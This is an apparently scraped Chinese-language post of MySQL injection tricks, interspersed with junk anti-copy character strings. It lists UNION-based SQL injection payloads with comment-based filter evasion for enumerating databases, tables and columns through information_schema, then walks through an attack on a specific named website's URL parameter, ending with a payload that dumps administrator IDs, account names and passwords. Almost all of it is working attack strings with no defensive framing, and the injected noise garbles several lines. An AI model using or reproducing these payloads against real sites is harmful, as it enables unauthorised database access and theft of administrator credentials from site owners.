mysql注入技巧

admin

查库

6 p5 m( n0 i4 k8 @2 cid=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*
/ M2 D0 q7 h+ ]4 L! ?0 m
4 r0 v" C4 u: S" {查表
. ?& \' ~0 _/ i; ^4 ]! v! O
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1

% F* V; |6 c! B( p6 M# i查段
' D/ N' i1 N  R
8 Q; }9 i7 k( t5 K% \id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1

* J. @3 {: I# e3 ?
9 C2 i1 L6 f/ K- Q. Xmysql5高级注入方法暴表
$ I" l/ W0 o, a/ j" }6 x$ V( Q7 u
! d! s+ Q- x! \6 V! O8 u0 l例子如下:

1.爆表
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
, t, ?  J- S2 G1 T这样爆到第4个时出现了admin_user表。

2.暴字段
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

" L  z. h" j* y0 _" F* Z7 V% V
3.爆密码
) C- f" j# _: [  @! R* jhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*

) f4 r4 [) {$ V% u0 D0 ^